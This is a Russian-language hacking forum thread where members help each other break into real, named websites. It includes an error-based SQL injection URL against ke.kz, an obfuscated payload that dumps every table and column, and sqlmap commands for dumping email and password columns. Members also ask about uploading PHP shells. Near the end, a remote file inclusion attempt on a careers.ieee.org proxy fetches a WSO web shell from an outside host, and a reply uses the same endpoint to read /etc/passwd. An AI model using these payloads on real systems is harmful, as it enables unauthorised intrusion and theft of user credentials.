Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Всё и проще и сложнее. Под катом практически весь url енкодинг, но вытащить ещё можно что-либо)
    Code:
    http://www.ke.kz/ru'and(extractvalue(1,concat(1,user())))or'
     
  2. lansia

    lansia New Member

    Joined:
    6 Feb 2011
    Messages:
    112
    Likes Received:
    4
    Reputations:
    5
    Как залить на dle gif картинку с php кодом?
     
  3. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    Слышал что можно залить шелл на прямую (без доступа в админку) , если есть скуля... Кто что скажет по этому поводу ?
     
  4. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    59
    Likes Received:
    16
    Reputations:
    0
    Имеем скулю
    Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит
    http://clip2net.com/s/6P9XZ6

    При чем, если дампить отдельно, или mail, или pass то все норм.
    Через havij не вариант, он долго думает, особенно при сохранении больших дампов.

    Как решить проблему? За ранее спасибо
     
  5. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    59
    Likes Received:
    16
    Reputations:
    0
    OxoTnik
    Code:
     python sqlmap.py -u http://site.com/index.php?i=-1 --dump -D db_name -T table_name -C "column1,column2"
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Так зачем скульмап, если можно одним запросом вывести все таблици и колонки.

    В принтабельное поле вставляешь.

    (%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
     
    _________________________
    1 person likes this.
  7. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    59
    Likes Received:
    16
    Reputations:
    0
    Кажется разобрался, походу эта трабла возникла из-за неравного кол-ва колонок. Задал параметры start=1 и stop= чуть меньше, чем coun column
    Главное что бы теперь ничего не перемешалось :)
    А залиться не получается. Нет прав на запись
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    WebCruiser хорошо дампить, если он скулю раскрутит
     
  9. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    подскажите софт чтоб залить бд себе на машину.. пробовал через havij, но это нереально долго.. какие есть предложения?
     
  10. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    И снова здравствуйте. mysqldump, входящий в стандратную поставку mysql-клиента. Если речь о mysql, конечно.
     
  11. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер
    Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?!
    Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
     
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    792
    Reputations:
    230
    sqlmap
    https://github.com/sqlmapproject/sqlmap/wiki/Usage
    -D dbname -T tablename -C columns --dump
     
    _________________________
  13. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    софт раскручивает самые обычные и самые стандартные скули... Если ручками раскручивать скули не умеешь, то и от софта будет не много толку. Возможно какие-то символы фильтруются.. например имя таблицы.. это исправляется зашифровкой имени таблицы в hex. А вообще так сказать сложно..выложи скулю.. тебе скажут в чем проблема
     
    1 person likes this.
  14. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс.

    Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.
     
  15. lansia

    lansia New Member

    Joined:
    6 Feb 2011
    Messages:
    112
    Likes Received:
    4
    Reputations:
    5
    Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
     
  16. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    792
    Reputations:
    230
    м.б слэш лишний? или путь /etc/phpmyadmin/config.inc.php
     
    _________________________
    #23056 grimnir, 17 Feb 2014
    Last edited: 17 Feb 2014
  17. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    278
    Likes Received:
    116
    Reputations:
    26
    Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
     
  18. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    565
    Likes Received:
    50
    Reputations:
    54
    Как подсказывает ман:
     
  19. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    792
    Reputations:
    230
    Приветствую,вообщем нужно мне подтянуть знания по RFI
    Вопрос собственно -как проинклюдить ,почему не получается и как можно решить?
    Для примера нашел вот
    h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
     
    _________________________
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    просто читалка.

    http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd
    http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.